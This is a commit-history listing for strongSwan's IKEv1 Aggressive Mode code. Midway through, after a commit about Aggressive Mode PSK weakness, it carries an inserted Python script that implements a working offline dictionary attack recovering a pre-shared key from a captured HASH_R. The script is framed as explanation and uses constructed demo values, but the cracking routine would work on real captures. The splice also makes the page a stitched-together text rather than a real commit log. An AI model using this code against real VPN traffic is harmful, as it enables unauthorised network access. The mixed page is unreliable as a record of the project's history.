Commit Graph

36 Commits

Author SHA1 Message Date
Tobias Brunner c9599d4101 proposal: Extract proposal selection code in ike/child_cfg_t
Also invert the PREFER_CONFIGURED flag (i.e. make it PREFER_SUPPLIED)
so the default, without flags, is what we preferred so far.
2019-10-24 17:36:33 +02:00
Thomas Egerer f930b732c4 proposal: Use flags to select/match proposals
During proposal selection with ike/child_cfgs a couple of boolean
variables can be set (e.g. private, prefer_self, strip_dh). To simplify
the addition of new parameters, these functions now use a set of flags
instead of individual boolean values.

Signed-off-by: Thomas Egerer <thomas.egerer@secunet.com>
2019-10-24 17:22:53 +02:00
Tobias Brunner 4899a4c025 aggressive-mode: Trigger alerts for authentication failures 2018-08-31 11:02:43 +02:00
Tobias Brunner 1b67166921 Unify format of HSR copyright statements 2018-05-23 16:32:53 +02:00
Tobias Brunner 0a954d6789 ike: Add configuration option to switch to preferring supplied proposals over local ones 2016-06-17 18:48:07 +02:00
Tobias Brunner 3a40d572c6 ike-cfg: Add option to prefer supplied proposals over locally configured ones 2016-06-17 18:48:07 +02:00
Andreas Steffen b12c53ce77 Use standard unsigned integer types 2016-03-24 18:52:48 +01:00
Martin Willi 4f243dfaa9 ikev1: Defer Mode Config push after CHILD adoption when using XAuth 2014-08-25 09:55:44 +02:00
Martin Willi 891bbbd4bb ikev1: Defer Mode Config push after CHILD adoption and reauth detection
When an initiator starts reauthentication on a connection that uses push
mode to assign a virtual IP, we can't execute the Mode Config before releasing
the virtual IP. Otherwise we would request a new and different lease, which
the client probably can't handle. Defer Mode Config execution, so the same IP
gets first released then reassigned during reauthentication.
2014-08-25 09:55:44 +02:00
Martin Willi 3ecfc83c6b payload: Use common prefixes for all payload type identifiers
The old identifiers did not use a proper namespace and often clashed with
other defines.
2014-06-04 15:53:03 +02:00
Tobias Brunner d223fe807a libcharon: Use lib->ns instead of charon->name 2014-02-12 14:34:32 +01:00
Tobias Brunner 9e1ce63915 ikev1: Fix config switching due to failed authentication during Aggressive mode
The encoded ID payload gets destroyed by the authenticator, which caused
a segmentation fault after the switch.

Fixes #501.
2014-02-12 13:53:03 +01:00
Martin Willi e3311e9b87 ikev1: implement mode config push mode 2013-09-04 10:33:38 +02:00
Tobias Brunner 8a0a1ae857 Delete IKE_SAs if responder does not initiate XAuth exchange within a certain time frame 2013-03-19 12:00:00 +01:00
Volker Rümelin 0ff8d20a89 Add support for draft-ietf-ipsec-nat-t-ike-03 and earlier
This adds support for early versions of the draft that eventually
resulted in RFC 3947.
2012-12-19 11:03:42 +01:00
Martin Willi 497ce2cf51 Support multiple address pools configured on a peer_cfg 2012-08-30 16:43:42 +02:00
Martin Willi 101d26babe Support multiple virtual IPs on peer_cfg and ike_sa classes 2012-08-30 16:43:42 +02:00
Martin Willi cd55a3cb77 Use actual daemon name to enable XAuth/PSK with aggressive mode 2012-08-10 11:53:18 +02:00
Martin Willi 9d2968e272 As a responder, don't start a TRANSACTION request if we expect one from the initiator 2012-06-29 13:40:31 +02:00
Martin Willi 8ff45cfd99 Queue a mode config task as responder if we need a virtual IP 2012-06-27 11:42:56 +02:00
Martin Willi c2a391746c Add basic support for XAuth responder authentication 2012-06-27 11:42:56 +02:00
Martin Willi 0c32b9c62f Enforce uniqueids=keep only for non-XAuth Main/Aggressive Modes 2012-06-25 10:18:35 +02:00
Martin Willi b31a56f128 Require a scary option to respond to Aggressive Mode PSK requests
While Aggressive Mode PSK is widely used, it is known to be subject
to dictionary attacks by passive attackers. We don't complain as
initiator to be compatible with existing (insecure) setups, but
require a scary strongswan.conf option if someone wants to use it
as responder.
2012-06-14 10:25:48 +02:00
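The dictionary attack this commit refers to can be shown end to end. The following is an added example, not strongSwan code and not part of the commit: it reconstructs the RFC 2409 section 5.4 pre-shared-key derivation (SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)) with HMAC-SHA1 assumed as the negotiated prf, builds a constructed Aggressive Mode exchange with a known PSK, and then recovers that PSK from the cleartext fields alone. Every wire value (cookies, nonces, KE bodies, SAi_b, the FQDN identity and the word list) is constructed here for the demonstration; nothing is captured from a real peer.

```python
"""Offline dictionary attack against an IKEv1 Aggressive Mode PSK.

Added example (not strongSwan code). In Aggressive Mode the responder's
HASH_R travels in the clear in message 2, and so does every input to it
except the PSK itself, so a purely passive observer can test PSK guesses
offline. All wire values below are constructed, not captured.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """The negotiated prf; HMAC-SHA1 is assumed here (hash attribute of the SA)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)   (RFC 2409, section 5.4)."""
    return prf(psk, ni_b + nr_b)


@dataclass(frozen=True)
class AggressiveCapture:
    """Cleartext fields a passive attacker sees in Aggressive Mode messages 1 and 2."""
    gxi: bytes      # initiator KE payload body (g^xi)
    gxr: bytes      # responder KE payload body (g^xr)
    cky_i: bytes    # initiator cookie from the ISAKMP header
    cky_r: bytes    # responder cookie from the ISAKMP header
    sai_b: bytes    # initiator SA payload body (the offered transforms)
    idir_b: bytes   # responder ID payload body
    ni_b: bytes     # initiator nonce payload body
    nr_b: bytes     # responder nonce payload body
    hash_r: bytes   # responder HASH_R, sent unencrypted in message 2


def compute_hash_r(psk: bytes, c: AggressiveCapture) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)."""
    skeyid = skeyid_psk(psk, c.ni_b, c.nr_b)
    return prf(skeyid, c.gxr + c.gxi + c.cky_r + c.cky_i + c.sai_b + c.idir_b)


def _constructed(label: str, n: int) -> bytes:
    """Deterministic filler standing in for a real wire value (constructed, not captured)."""
    return hashlib.shake_256(label.encode()).digest(n)


def responder_message_2(psk: bytes) -> AggressiveCapture:
    """Build the constructed exchange the way the responder would, using the true PSK."""
    fields = dict(
        gxi=_constructed("g^xi", 128),      # 1024-bit MODP group public values (constructed)
        gxr=_constructed("g^xr", 128),
        cky_i=_constructed("CKY-I", 8),
        cky_r=_constructed("CKY-R", 8),
        sai_b=_constructed("SAi_b", 40),    # stand-in for the initiator's SA payload body
        idir_b=b"\x02\x00\x00\x00" + b"vpn.example.com",  # ID_FQDN, protocol 0, port 0
        ni_b=_constructed("Ni_b", 20),
        nr_b=_constructed("Nr_b", 20),
    )
    without_hash = AggressiveCapture(hash_r=b"", **fields)
    return AggressiveCapture(hash_r=compute_hash_r(psk, without_hash), **fields)


def crack_psk(capture: AggressiveCapture, wordlist: Iterable[str]) -> Optional[str]:
    """Test each candidate PSK offline against the captured HASH_R.

    No packet is ever sent to the gateway, so lockouts or logging on the
    responder cannot help; only the entropy of the PSK limits this.
    """
    for candidate in wordlist:
        guess = compute_hash_r(candidate.encode(), capture)
        if hmac.compare_digest(guess, capture.hash_r):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed word list; "Summer2012" plays the role of the weak shared secret.
    capture = responder_message_2(b"Summer2012")
    words = ["password", "cisco", "vpn", "Summer2012", "letmein"]
    print("recovered PSK:", crack_psk(capture, words))
```

The same verifier exists for the initiator side: HASH_I in message 3 is also unencrypted in Aggressive Mode and uses the same SKEYID, so a capture of either direction suffices. This is why the responder-side option the commit adds is gated behind an explicit setting, while initiator behaviour is left permissive for interoperability.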
Martin Willi e5f0f9ff96 Enforce uniqueness policy in IKEv1 main and aggressive modes 2012-06-08 16:15:22 +02:00
Tobias Brunner 647cd741e8 Added support for IKEv1 IPComp proposals in SA payload. 2012-05-24 15:32:28 +02:00
Martin Willi 3c475660c5 Apply IDir before deriving keys as aggressive initiator 2012-05-23 12:27:47 +02:00
Tobias Brunner 1a624ff45a Switch to alternative peer config in IKEv1 Main and Aggressive Mode. 2012-05-21 15:49:25 +02:00
Martin Willi 7ce504e182 Flush task queues explicitly, not implicitly if task returns ALREADY_DONE 2012-05-21 14:17:09 +02:00
Tobias Brunner 7a56c35fc9 Remove executable flag from source files. 2012-05-18 10:04:08 +02:00
Martin Willi 3624b09e21 Set selected proposal on IKEv1 SA, don't pass it separately to Phase 1 helper 2012-03-20 17:31:37 +01:00
Martin Willi f420f51f55 Invoke authorization hooks for IKEv1 connections 2012-03-20 17:31:36 +01:00
Martin Willi 2ddd45c9a7 Simplified DPD handling by using a task for a single message only 2012-03-20 17:31:35 +01:00
Clavister OpenSource 3e6b740336 Isakmp_dpd task added. 2012-03-20 17:31:35 +01:00
Martin Willi 37c12bd31e Streamlined debug output when initiating IKEv1 IKE_SAs 2012-03-20 17:31:34 +01:00
Martin Willi 91c212fd6a Select IKEv1 configurations by main/aggressive mode option 2012-03-20 17:31:34 +01:00
Martin Willi ee325b555f Implemented aggressive mode using Phase 1 helper class 2012-03-20 17:31:33 +01:00